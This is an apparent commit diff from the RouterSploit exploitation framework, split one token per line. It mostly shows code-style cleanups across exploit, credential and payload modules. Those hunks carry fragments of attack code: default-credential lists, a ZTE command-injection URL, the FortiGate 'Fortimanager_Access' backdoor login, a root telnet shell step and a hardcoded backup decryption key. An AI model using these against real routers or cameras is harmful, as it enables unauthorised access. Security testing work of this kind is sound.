'<script type="text/javascript" src="/themes/pfsense_ng/javascript/niftyjsCode.js"></script>'
,
'var csrfMagicToken ='
]]):
if
all
([
x
in
response
.
text
for
x
in
[
'<script type="text/javascript" src="/themes/pfsense_ng/javascript/niftyjsCode.js"></script>'
,
'var csrfMagicToken ='
]]):
return
True
return
False
...
...
routersploit/modules/creds/routers/technicolor/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/technicolor/telnet_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/thomson/telnet_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/tplink/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/tplink/telnet_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/ubiquiti/ssh_default_creds.py
View file @
62b83fb4
...
...
@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads
=
OptInteger
(
1
,
"Number of threads"
)
defaults
=
OptWordlist
(
"admin:admin,root:ubnt,ubnt:ubnt"
,
"User:Pass or file with default credentials (file://)"
)
routersploit/modules/creds/routers/ubiquiti/telnet_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/zte/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/zte/telnet_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/zyxel/ssh_default_creds.py
View file @
62b83fb4
routersploit/modules/creds/routers/zyxel/telnet_default_creds.py
View file @
62b83fb4
routersploit/modules/exploits/cameras/dlink/dcs_930l_932l_auth_bypass.py
View file @
62b83fb4
...
...
@@ -26,10 +26,9 @@ class Exploit(HTTPClient):
port
=
OptPort
(
8080
,
"Target HTTP port"
)
def
__init__
(
self
):
config_content
=
None
self
.
config_content
=
None
def
run
(
self
):
if
self
.
check
():
print_success
(
"Target appears to be vulnerable."
)
...
...
@@ -115,4 +114,3 @@ class Exploit(HTTPClient):
ret_str
+=
tmp_str
[
i
+
half_str_len
]
+
tmp_str
[
i
]
return
ret_str
routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor.py
View file @
62b83fb4
...
...
@@ -42,7 +42,6 @@ class Exploit(TelnetClient):
print_success
(
"SQLI successful, going to telnet into port 20000 "
"with username root and no password to get shell"
)
tn
=
self
.
telnet_login
(
"root"
,
""
,
port
=
20000
)
if
tn
:
self
.
telnet_interactive
(
tn
)
...
...
routersploit/modules/exploits/cameras/multi/P2P_wificam_credential_disclosure.py
View file @
62b83fb4
import
requests
from
routersploit.core.exploit
import
*
from
routersploit.core.http.http_client
import
HTTPClient
...
...
routersploit/modules/exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal.py
View file @
62b83fb4
routersploit/modules/exploits/cameras/multi/netwave_ip_camera_information_disclosure.py
View file @
62b83fb4
...
...
@@ -59,7 +59,7 @@ class Exploit(HTTPClient):
for
chunk
in
response
.
iter_content
(
chunk_size
=
100
):
if
"admin"
in
chunk
:
print_success
(
chunk
)
except
:
except
Exception
:
print_error
(
"Exploit failed - could not read /proc/kcore"
)
@mute
...
...
routersploit/modules/exploits/generic/heartbleed.py
View file @
62b83fb4
...
...
@@ -150,7 +150,8 @@ class Exploit(TCPClient):
a
,
b
=
item
.
span
()
clean_data
+=
data
[
tmp_b
:
a
]
tmp_b
=
b
clean_data
+=
"................................ repeated {} times ................................"
.
format
(
b
-
a
-
64
)
repeated
=
b
-
a
-
64
clean_data
+=
"................................ repeated {} times ................................"
.
format
(
repeated
)
clean_data
+=
data
[
b
:]
print_info
(
clean_data
)
...
...
@@ -268,12 +269,12 @@ class Exploit(TCPClient):
def
parse_server_hello
(
self
,
data
):
version
=
unpack
(
">H"
,
data
[:
2
])[
0
]
print_status
(
"
\t\t
Server Hello Version: 0x{:x}"
.
format
(
version
))
random
=
unpack
(
">"
+
"B"
*
32
,
data
[
2
:
34
])
random
=
unpack
(
">"
+
"B"
*
32
,
data
[
2
:
34
])
random_hex
=
str
(
binascii
.
hexlify
(
bytes
(
random
)),
"utf-8"
)
print_status
(
"
\t\t
Server Hello random data: {}"
.
format
(
random_hex
))
session_id_length
=
unpack
(
">B"
,
data
[
34
:
35
])[
0
]
print_status
(
"
\t\t
Server Hello Session ID length: {}"
.
format
(
session_id_length
))
session_id
=
unpack
(
">"
+
"B"
*
session_id_length
,
data
[
35
:
35
+
session_id_length
])
session_id
=
unpack
(
">"
+
"B"
*
session_id_length
,
data
[
35
:
35
+
session_id_length
])
session_id_hex
=
str
(
binascii
.
hexlify
(
bytes
(
session_id
)),
"utf-8"
)
print_status
(
"
\t\t
Server Hello session id: {}"
.
format
(
session_id_hex
))
...
...
@@ -282,22 +283,21 @@ class Exploit(TCPClient):
print_status
(
"
\t\t
Certificates length: {}"
.
format
(
cert_len
))
print_status
(
"
\t\t
Data length: {}"
.
format
(
len
(
data
)))
#contains multiple certs
#
contains multiple certs
already_read
=
3
cert_counter
=
0
while
already_read
<
cert_len
:
cert_counter
+=
1
# get single certificate length
single_cert_len_padding
,
single_cert_len
=
unpack
(
">BH"
,
data
[
already_read
:
already_read
+
3
])
single_cert_len_padding
,
single_cert_len
=
unpack
(
">BH"
,
data
[
already_read
:
already_read
+
3
])
print_status
(
"
\t\t
Certificate {}"
.
format
(
cert_counter
))
print_status
(
"
\t\t\t
Certificate {}: Length: {}"
.
format
(
cert_counter
,
single_cert_len
))
certificate_data
=
data
[(
already_read
+
3
):
(
already_read
+
3
+
single_cert_len
)]
certificate_data
=
data
[(
already_read
+
3
):
(
already_read
+
3
+
single_cert_len
)]
cert
=
x509
.
load_der_x509_certificate
(
certificate_data
,
default_backend
())
print_status
(
"
\t\t\t
Certificate {}: {}"
.
format
(
cert_counter
,
cert
))
already_read
=
already_read
+
single_cert_len
+
3
def
get_ssl_record
(
self
):
hdr
=
self
.
tcp_recv
(
self
.
tcp_client
,
self
.
SSL_RECORD_HEADER_SIZE
)
...
...
routersploit/modules/exploits/generic/shellshock.py
View file @
62b83fb4
...
...
@@ -44,8 +44,6 @@ class Exploit(HTTPClient):
def
execute
(
self
,
cmd
):
marker
=
utils
.
random_text
(
32
)
url
=
"{}:{}{}"
.
format
(
self
.
target
,
self
.
port
,
self
.
path
)
injection
=
self
.
valid
.
replace
(
"{{marker}}"
,
marker
)
.
replace
(
"{{cmd}}"
,
cmd
)
headers
=
{
...
...
@@ -76,8 +74,6 @@ class Exploit(HTTPClient):
cmd
=
"echo $(({}-1))"
.
format
(
number
)
marker
=
utils
.
random_text
(
32
)
url
=
"{}:{}{}"
.
format
(
self
.
target
,
self
.
port
,
self
.
path
)
for
payload
in
self
.
payloads
:
injection
=
payload
.
replace
(
"{{marker}}"
,
marker
)
.
replace
(
"{{cmd}}"
,
cmd
)
...
...
routersploit/modules/exploits/routers/2wire/gateway_auth_bypass.py
View file @
62b83fb4
...
...
@@ -48,8 +48,6 @@ class Exploit(HTTPClient):
return
False
# target is not vulnerable
# checking if authentication can be bypassed
url
=
"{}:{}/xslt"
.
format
(
self
.
target
,
self
.
port
)
response
=
self
.
http_request
(
method
=
"GET"
,
path
=
"/xslt"
,
...
...
routersploit/modules/exploits/routers/3com/imc_info_disclosure.py
View file @
62b83fb4
routersploit/modules/exploits/routers/3com/officeconnect_rce.py
View file @
62b83fb4
routersploit/modules/exploits/routers/billion/billion_7700nr4_password_disclosure.py
View file @
62b83fb4
...
...
@@ -46,7 +46,7 @@ class Exploit(HTTPClient):
try
:
print_status
(
"Trying to base64 decode"
)
password
=
base64
.
b64decode
(
res
[
0
])
except
:
except
Exception
:
print_error
(
"Exploit failed - could not decode password"
)
return
...
...
routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
View file @
62b83fb4
...
...
@@ -178,7 +178,7 @@ class Exploit(TCPClient):
print_status
(
"Connection OK"
)
print_status
(
"Received bytes from telnet service: {}"
.
format
(
repr
(
s
.
recv
(
1024
))))
except
:
except
Exception
:
print_error
(
"Connection failed"
)
return
...
...
@@ -201,7 +201,7 @@ class Exploit(TCPClient):
try
:
t
=
telnetlib
.
Telnet
(
self
.
target
,
int
(
self
.
telnet_port
))
t
.
interact
()
except
:
except
Exception
:
print_error
(
"Exploit failed"
)
else
:
print_status
(
"Check if Telnet authentication was set back"
)
...
...
routersploit/modules/exploits/routers/cisco/firepower_management60_path_traversal.py
View file @
62b83fb4
routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py
View file @
62b83fb4
...
...
@@ -114,15 +114,12 @@ class Exploit(HTTPClient, SSHClient):
"file"
:
(
sh_name
,
payload
)
}
try
:
self
.
http_request
(
method
=
"POST"
,
path
=
"/DetectionPolicy/rules/rulesimport.cgi"
,
files
=
multipart_form_data
,
session
=
self
.
session
)
except
:
pass
return
...
...
routersploit/modules/exploits/routers/comtrend/ct_5361t_password_disclosure.py
View file @
62b83fb4
...
...
@@ -75,7 +75,7 @@ class Exploit(HTTPClient):
if
len
(
res
):
try
:
b64decode
(
res
[
0
])
# checking if data is base64 encoded
except
:
except
Exception
:
return
False
# target is not vulnerable
else
:
return
False
# target is not vulnerable
...
...
routersploit/modules/exploits/routers/dlink/dcs_930l_auth_rce.py
View file @
62b83fb4
routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
View file @
62b83fb4
...
...
@@ -67,7 +67,7 @@ class Exploit(UDPClient):
sock
.
send
(
buf
)
response
=
sock
.
recv
(
65535
)
sock
.
close
()
except
:
except
Exception
:
return
False
# target is not vulnerable
if
"Linux, UPnP/1.0, DIR-"
in
response
:
...
...
routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py
View file @
62b83fb4
from
routersploit.core.exploit
import
*
from
routersploit.core.udp.udp_client
import
UDPClient
class
Exploit
(
UDPClient
):
__info__
=
{
"name"
:
"D-Link DIR-815 & DIR-850L RCE"
,
...
...
routersploit/modules/exploits/routers/dlink/dir_850l_creds_disclosure.py
View file @
62b83fb4
...
...
@@ -25,7 +25,6 @@ class Exploit(HTTPClient):
target
=
OptIP
(
""
,
"Target IPv4 or IPv6 address"
)
port
=
OptPort
(
80
,
"Target HTTP port"
)
def
run
(
self
):
self
.
credentials
=
[]
...
...
routersploit/modules/exploits/routers/dlink/dns_320l_327l_rce.py
View file @
62b83fb4
routersploit/modules/exploits/routers/dlink/dsl_2750b_info_disclosure.py
View file @
62b83fb4
routersploit/modules/exploits/routers/dlink/dsl_2750b_rce.py
View file @
62b83fb4
routersploit/modules/exploits/routers/dlink/dsp_w110_rce.py
View file @
62b83fb4
routersploit/modules/exploits/routers/dlink/dvg_n5402sp_path_traversal.py
View file @
62b83fb4
routersploit/modules/exploits/routers/dlink/dwl_3200ap_password_disclosure.py
View file @
62b83fb4
...
...
@@ -3,7 +3,6 @@ from routersploit.core.exploit import *
from
routersploit.core.http.http_client
import
HTTPClient
class
Exploit
(
HTTPClient
):
__info__
=
{
"name"
:
"D-Link DWL-3200AP Password Disclosure"
,
...
...
routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py
View file @
62b83fb4
...
...
@@ -35,7 +35,7 @@ class Exploit(TCPClient, TelnetClient):
try
:
sock
.
sendto
(
b
"HELODBG"
,
(
self
.
target
,
39889
))
response
=
sock
.
recv
(
1024
)
except
:
except
Exception
:
pass
sock
.
close
()
...
...
@@ -47,7 +47,7 @@ class Exploit(TCPClient, TelnetClient):
try
:
tn
=
telnetlib
.
Telnet
(
self
.
target
,
self
.
telnet_port
)
tn
.
interact
()
except
:
except
Exception
:
print_error
(
"Exploit failed - could not connect to the telnet service"
)
else
:
print_error
(
"Exploit failed - target seems to be not vulnerable"
)
...
...
@@ -64,7 +64,7 @@ class Exploit(TCPClient, TelnetClient):
if
"Hello"
in
response
:
sock
.
sendto
(
b
"BYEDBG"
,
(
self
.
target
,
39889
))
return
True
# target is vulnerable
except
:
except
Exception
:
pass
return
False
# target is not vulnerable
routersploit/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py
View file @
62b83fb4
routersploit/modules/exploits/routers/dlink/multi_hnap_rce.py
View file @
62b83fb4
from
routersploit.core.exploit
import
*
from
routersploit.core.http.http_client
import
HTTPClient
class
Exploit
(
HTTPClient
):
__info__
=
{
"name"
:
"D-Link Multi HNAP RCE"
,
...
...
routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py
View file @
62b83fb4
...
...
@@ -36,7 +36,7 @@ class Exploit(SSHClient):
client
.
connect
(
self
.
target
,
self
.
port
,
username
=
''
,
allow_agent
=
False
,
look_for_keys
=
False
)
except
paramiko
.
ssh_exception
.
SSHException
:
pass
except
:
except
Exception
:
print_error
(
"Exploit Failed - SSH Service is down"
)
return
...
...
@@ -45,7 +45,7 @@ class Exploit(SSHClient):
trans
.
auth_password
(
username
=
'Fortimanager_Access'
,
password
=
''
,
event
=
None
,
fallback
=
True
)
except
paramiko
.
ssh_exception
.
AuthenticationException
:
pass
except
:
except
Exception
:
print_status
(
"Error with Existing Session. Wait few minutes."
)
return
...
...
@@ -54,7 +54,7 @@ class Exploit(SSHClient):
print_success
(
"Exploit succeeded"
)
ssh_interactive
(
client
)
except
:
except
Exception
:
print_error
(
"Exploit failed"
)
return
...
...
@@ -67,7 +67,7 @@ class Exploit(SSHClient):
client
.
connect
(
self
.
target
,
self
.
port
,
username
=
''
,
allow_agent
=
False
,
look_for_keys
=
False
)
except
paramiko
.
ssh_exception
.
SSHException
:
pass
except
:
except
Exception
:
return
False
# target is not vulnerable
trans
=
client
.
get_transport
()
...
...
@@ -75,12 +75,12 @@ class Exploit(SSHClient):
trans
.
auth_password
(
username
=
'Fortimanager_Access'
,
password
=
''
,
event
=
None
,
fallback
=
True
)
except
paramiko
.
ssh_exception
.
AuthenticationException
:
pass
except
:
except
Exception
:
return
None
# could not verify
try
:
trans
.
auth_interactive
(
username
=
'Fortimanager_Access'
,
handler
=
self
.
custom_handler
)
except
:
except
Exception
:
return
False
# target is not vulnerable
return
True
# target is vulnerable
...
...
routersploit/modules/exploits/routers/huawei/e5331_mifi_info_disclosure.py
View file @
62b83fb4
routersploit/modules/exploits/routers/huawei/hg520_info_dislosure.py
View file @
62b83fb4
...
...
@@ -72,7 +72,7 @@ class Exploit(UDPClient):
try
:
print_status
(
"Waiting for response"
)
response
=
sock
.
recv
(
1024
)
except
:
except
Exception
:
print_error
(
"Exploit failed - device seems to be not vulnerable"
)
return
...
...
@@ -88,7 +88,7 @@ class Exploit(UDPClient):
try
:
response
=
sock
.
recv
(
1024
)
except
:
except
Exception
:
return
False
# target is not vulnerable
if
len
(
response
):
...
...
routersploit/modules/exploits/routers/ipfire/ipfire_oinkcode_rce.py
View file @
62b83fb4
...
...
@@ -54,7 +54,7 @@ class Exploit(HTTPClient):
"ACTION2"
:
"snort"
}
response
=
self
.
http_request
(
self
.
http_request
(
method
=
"POST"
,
path
=
"/cgi-bin/ids.cgi"
,
headers
=
headers
,
...
...
@@ -81,7 +81,7 @@ class Exploit(HTTPClient):
version
=
res
[
0
][
0
]
update
=
int
(
res
[
0
][
1
])
if
Version
(
version
)
<=
Version
(
"2.19"
)
and
u
dp
ate
<=
110
:
if
Version
(
version
)
<=
Version
(
"2.19"
)
and
u
pd
ate
<=
110
:
return
True
# target is vulnerable
return
False
# target is not vulnerable
routersploit/modules/exploits/routers/mikrotik/routeros_jailbreak.py
View file @
62b83fb4
routersploit/modules/exploits/routers/multi/gpon_home_gateway_rce.py
View file @
62b83fb4
routersploit/modules/exploits/routers/multi/misfortune_cookie.py
View file @
62b83fb4
...
...
@@ -142,9 +142,9 @@ class Exploit(HTTPClient):
if
response
is
not
None
and
response
.
status_code
<=
302
:
print_success
(
"Seems good but check "
+
"{}:{}"
.
format
(
self
.
target
,
self
.
port
)
+
"
using your browser to verify if authentication is disabled or not."
"Seems good but check "
+
"{}:{} "
.
format
(
self
.
target
,
self
.
port
)
+
"
using your browser to verify if authentication is disabled or not."
)
return
True
else
:
...
...
routersploit/modules/exploits/routers/multi/rom0.py
View file @
62b83fb4
routersploit/modules/exploits/routers/technicolor/tc7200_password_disclosure_v2.py
View file @
62b83fb4
...
...
@@ -63,9 +63,9 @@ class Exploit(HTTPClient):
@staticmethod
def
decrypt_backup
(
backup
):
key
=
binascii
.
unhexlify
(
'000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F'
)
l
=
(
len
(
backup
)
/
16
)
*
16
l
ength
=
(
len
(
backup
)
/
16
)
*
16
cipher
=
AES
.
new
(
key
,
AES
.
MODE_ECB
)
plain
=
cipher
.
decrypt
(
backup
[
0
:
l
])
plain
=
cipher
.
decrypt
(
backup
[
0
:
l
ength
])
return
plain
@mute
...
...
routersploit/modules/exploits/routers/technicolor/tg784_authbypass.py
View file @
62b83fb4
import
re
from
io
import
StringIO
from
routersploit.core.exploit
import
*
from
routersploit.core.ftp.ftp_client
import
FTPClient
...
...
@@ -57,7 +56,6 @@ class Exploit(FTPClient):
return
False
def
get_credentials
(
self
):
print_status
(
"Trying FTP authentication with Username: {} and Password: {}"
.
format
(
self
.
username
,
self
.
password
))
...
...
routersploit/modules/exploits/routers/thomson/twg849_info_disclosure.py
View file @
62b83fb4
routersploit/modules/exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure.py
View file @
62b83fb4
...
...
@@ -56,9 +56,9 @@ class Exploit(HTTPClient):
return
passwd
def
parse
(
self
,
data
):
l
=
data
.
split
(
b
'
\r\n
'
)
del
l
[
0
]
for
item
in
l
:
parts
=
data
.
split
(
b
'
\r\n
'
)
del
parts
[
0
]
for
item
in
parts
:
try
:
if
'authKey'
in
item
:
authKey
=
item
.
split
()[
1
]
...
...
@@ -66,7 +66,7 @@ class Exploit(HTTPClient):
cPskSecret
=
item
.
split
()[
1
]
if
'cUsrPIN'
in
item
:
cUsrPIN
=
item
.
split
()[
1
]
except
:
except
Exception
:
pass
return
authKey
,
cPskSecret
,
cUsrPIN
...
...
routersploit/modules/exploits/routers/zte/zxv10_rce.py
View file @
62b83fb4
...
...
@@ -42,10 +42,9 @@ class Exploit(HTTPClient):
print_error
(
"Exploit failed - target seems to be not vulnerable"
)
def
execute
(
self
,
cmd
):
path
=
"/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;echo $({})&NumofRepeat=1&"
\
"DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit"
.
format
(
cmd
)
url
=
"{}:{}{}"
.
format
(
self
.
target
,
self
.
port
,
path
)
try
:
response
=
self
.
http_request
(
method
=
"GET"
,
...
...
@@ -73,7 +72,7 @@ class Exploit(HTTPClient):
res
=
res1
+
res2
if
res
[
0
]
!=
"</textarea>"
:
return
res
[
0
]
except
:
except
Exception
:
pass
return
""
...
...
@@ -85,7 +84,7 @@ class Exploit(HTTPClient):
path
=
"/template.gch"
,
session
=
self
.
session
)
except
:
except
Exception
:
return
# Check for Model Name
...
...
@@ -140,7 +139,7 @@ class Exploit(HTTPClient):
if
"Username"
not
in
response
.
text
and
"Password"
not
in
response
.
text
:
print_success
(
"Successful authentication"
)
return
True
except
:
except
Exception
:
pass
return
False
...
...
routersploit/modules/exploits/routers/zyxel/p660hn_t_v2_rce.py
View file @
62b83fb4
...
...
@@ -76,7 +76,7 @@ class Exploit(HTTPClient):
def
login
(
self
):
credentials
=
base64
.
encode
(
"{}:{}"
.
format
(
self
.
username
,
self
.
password
))
url
=
"/cgi-bin/index.asp?"
+
credentials
path
=
"/cgi-bin/index.asp?"
+
credentials
data
=
{
"Loginuser"
:
"supervisor"
,
...
...
routersploit/modules/generic/bluetooth/btle_write.py
View file @
62b83fb4
...
...
@@ -20,7 +20,6 @@ class Exploit(BTLEClient):
data
=
OptString
(
"41424344"
,
"Data (in hex format)"
)
buffering
=
OptBool
(
"true"
,
"Buffering enabled: true/false. Results in real time."
)
def
run
(
self
):
try
:
data
=
bytes
.
fromhex
(
self
.
data
)
...
...
routersploit/modules/payloads/__init__.py
View file @
62b83fb4
routersploit/modules/payloads/perl/bind_tcp.py
View file @
62b83fb4
from
routersploit.core.exploit
import
*
from
routersploit.core.exploit.payloads
import
BindTCPPayloadMixin
,
GenericPayload
...
...
routersploit/modules/payloads/perl/reverse_tcp.py
View file @
62b83fb4
from
routersploit.core.exploit
import
*
from
routersploit.core.exploit.payloads
import
GenericPayload
,
ReverseTCPPayloadMixin
...
...
routersploit/modules/payloads/php/reverse_tcp.py
View file @
62b83fb4
from
base64
import
b64encode
from
routersploit.core.exploit
import
*
from
routersploit.core.exploit.payloads
import
GenericPayload
,
ReverseTCPPayloadMixin
...
...
routersploit/modules/payloads/python/bind_tcp.py
View file @
62b83fb4
from
base64
import
b64encode
from
routersploit.core.exploit
import
*
from
routersploit.core.exploit.payloads
import
BindTCPPayloadMixin
,
GenericPayload
...
...
routersploit/modules/payloads/python/reverse_tcp.py
View file @
62b83fb4
from
base64
import
b64encode
from
routersploit.core.exploit
import
*
from
routersploit.core.exploit.payloads
import
GenericPayload
,
ReverseTCPPayloadMixin
...
...
routersploit/modules/scanners/autopwn.py
View file @
62b83fb4
rsf.py
View file @
62b83fb4
...
...
@@ -18,5 +18,6 @@ def routersploit():
rsf
=
RoutersploitInterpreter
()
rsf
.
start
()
if
__name__
==
"__main__"
:
routersploit
()
tests/conftest.py
View file @
62b83fb4
import
pytest
from
unittest.mock
import
patch
from
threat9_test_bed.scenarios
import
HttpScenario
from
threat9_test_bed.service_mocks
import
HttpScenarioService
,
HttpServiceMock
from
threat9_test_bed.scenarios
import
TelnetScenario
from
threat9_test_bed.service_mocks.telnet_service_mock
import
TelnetServiceMock
import
routersploit.core.exploit.shell
@pytest.fixture
def
target
():
with
HttpServiceMock
(
"127.0.0.1"
,
0
)
as
target_
:
yield
target_
@pytest.fixture
(
scope
=
"session"
)
def
empty_target
():
with
HttpScenarioService
(
"127.0.0.1"
,
0
,
...
...
@@ -55,8 +53,8 @@ def timeout_target():
HttpScenario
.
TIMEOUT
)
as
http_service
:
yield
http_service
@pytest.fixture
def
generic_target
():
with
TelnetServiceMock
(
"127.0.0.1"
,
0
,
TelnetScenario
.
AUTHORIZED
)
as
telnet_service
:
yield
telnet_service
tests/creds/cameras/basler/test_webinterface_default_creds.py
View file @
62b83fb4
from
flask
import
request
from
routersploit.modules.creds.cameras.basler.webinterface_http_form_default_creds
import
Exploit
...
...
tests/creds/generic/test_ftp_bruteforce.py
View file @
62b83fb4
...
...
@@ -8,7 +8,6 @@ def test_check_success(generic_target):
exploit
.
target
=
generic_target
.
host
exploit
.
port
=
generic_target
.
port
assert
exploit
.
check
()
is
False
assert
exploit
.
check_default
()
is
None
assert
exploit
.
run
()
is
None
tests/exploits/cameras/brickcom/test_corp_network_cameras_conf_disclosure.py
View file @
62b83fb4
...
...
@@ -26,7 +26,7 @@ configfile = (
"UserSetSetting.userList.users0.username=Cam_User"
"UserSetSetting.userList.users1.index=0"
"UserSetSetting.userList.users1.password=C0mm0mP4ss"
)
)
def
test_check_v1_success
(
target
):
...
...
tests/exploits/cameras/brickcom/test_users_cgi_creds_disclosure.py
View file @
62b83fb4
...
...
@@ -4,30 +4,29 @@ from routersploit.modules.exploits.cameras.brickcom.users_cgi_creds_disclosure i
response
=
(
"""
size=4
User1.index=1
User1.username=admin
User1.password=test1234
User1.privilege=1
User2.index=2
User2.username=viewer
User2.password=viewer
User2.privilege=0
User3.index=3
User3.username=rviewer
User3.password=rviewer
User3.privilege=2
User4.index=0
User4.username=visual
User4.password=visual1234
User4.privilege=0
"""
)
"""
size=4
User1.index=1
User1.username=admin
User1.password=test1234
User1.privilege=1
User2.index=2
User2.username=viewer
User2.password=viewer
User2.privilege=0
User3.index=3
User3.username=rviewer
User3.password=rviewer
User3.privilege=2
User4.index=0
User4.username=visual
User4.password=visual1234
User4.privilege=0
"""
)
def
apply_response
(
*
args
,
**
kwargs
):
...
...
tests/exploits/cameras/dlink/test_dcs_930l_932l_auth_bypass.py
View file @
62b83fb4
from
flask
import
request
,
Response
from
flask
import
Response
from
base64
import
b64decode
from
routersploit.modules.exploits.cameras.dlink.dcs_930l_932l_auth_bypass
import
Exploit
...
...
tests/exploits/cameras/multi/test_dvr_creds_disclosure.py
View file @
62b83fb4
...
...
@@ -13,4 +13,3 @@ def test_check_success(target):
assert
exploit
.
check
()
assert
exploit
.
run
()
is
None
tests/exploits/cameras/mvpower/test_dvr_jaws_rce.py
View file @
62b83fb4
tests/exploits/routers/dlink/test_dir_645_password_disclosure.py
View file @
62b83fb4
tests/exploits/routers/dlink/test_dir_850l_creds_disclosure.py
View file @
62b83fb4
...
...
@@ -12,37 +12,37 @@ def test_check_success(target):
"<gw_name>DIR-850L</gw_name>"
"<account>"
"<seqno>1</seqno>"
"
<max>2</max>"
"
<count>1</count>"
"
<entry>"
"
<uid>USR-</uid>"
"
<name>Admin</name>"
"
<usrid></usrid>"
"
<password>92830535</password>"
"
<group>0</group>"
"
<description></description>"
"
</entry>"
"
</account>"
"
<group>"
"
<seqno></seqno>"
"
<max></max>"
"
<count>0</count>"
"
</group>"
"
<session>"
"
<captcha>0</captcha>"
"
<dummy></dummy>"
"
<timeout>180</timeout>"
"
<maxsession>128</maxsession>"
"
<maxauthorized>16</maxauthorized>"
"
</session>"
"
</device>"
"
</module>"
"
<?xml version=
\"
1.0
\"
encoding=
\"
utf-8
\"
?>"
"
<hedwig>"
"
<result>OK</result>"
"
<node></node>"
"
<message>No modules for Hedwig</message>"
"
</hedwig>"
"
<max>2</max>"
"
<count>1</count>"
"
<entry>"
"
<uid>USR-</uid>"
"
<name>Admin</name>"
"
<usrid></usrid>"
"
<password>92830535</password>"
"
<group>0</group>"
"
<description></description>"
"
</entry>"
"
</account>"
"
<group>"
"
<seqno></seqno>"
"
<max></max>"
"
<count>0</count>"
"
</group>"
"
<session>"
"
<captcha>0</captcha>"
"
<dummy></dummy>"
"
<timeout>180</timeout>"
"
<maxsession>128</maxsession>"
"
<maxauthorized>16</maxauthorized>"
"
</session>"
"
</device>"
"
</module>"
"
<?xml version=
\"
1.0
\"
encoding=
\"
utf-8
\"
?>"
"
<hedwig>"
"
<result>OK</result>"
"
<node></node>"
"
<message>No modules for Hedwig</message>"
"
</hedwig>"
)
exploit
=
Exploit
()
...
...
tests/exploits/routers/dlink/test_dir_8xx_password_disclosure.py
View file @
62b83fb4
tests/exploits/routers/linksys/test_smartwifi_password_disclosure.py
View file @
62b83fb4
...
...
@@ -4,7 +4,7 @@ from routersploit.modules.exploits.routers.linksys.smartwifi_password_disclosure
def
test_check_success
(
target
):
""" Test scenario - successful check """
route_mock
=
target
.
get_route_mock
(
"/.htpasswd"
,
methods
=
[
"GET"
])
route_mock
=
target
.
get_route_mock
(
"/.htpasswd"
,
methods
=
[
"GET"
])
route_mock
.
return_value
=
(
'admin:$1$3Eb757jl$zFM3Mtk8Qmkp3kjbRukUq/'
)
...
...
tests/exploits/routers/multi/test_gpon_home_gateway_rce.py
View file @
62b83fb4
...
...
@@ -7,6 +7,7 @@ from routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce import Ex
mark
=
""
first_req
=
0
def
apply_response1
(
*
args
,
**
kwargs
):
global
mark
,
first_req
...
...
@@ -34,7 +35,7 @@ def apply_response_with_waiting(*args, **kwargs):
@mock.patch
(
"routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce.shell"
)
def
test_check_success
(
mocked_shell
,
target
):
def
test_check_success
1
(
mocked_shell
,
target
):
""" Test scenario - successful check without waiting """
route_mock1
=
target
.
get_route_mock
(
"/GponForm/diag_Form"
,
methods
=
[
"POST"
])
...
...
@@ -52,7 +53,7 @@ def test_check_success(mocked_shell, target):
@mock.patch
(
"routersploit.modules.exploits.routers.multi.gpon_home_gateway_rce.shell"
)
def
test_check_success
(
mocked_shell
,
target
):
def
test_check_success
2
(
mocked_shell
,
target
):
""" Test scenario - successful check with waiting """
route_mock1
=
target
.
get_route_mock
(
"/GponForm/diag_Form"
,
methods
=
[
"POST"
])
...
...
tests/exploits/routers/multi/test_rom0.py
View file @
62b83fb4
...
...
@@ -4,6 +4,7 @@ from routersploit.modules.exploits.routers.multi.rom0 import Exploit
response
=
b64decode
(
b
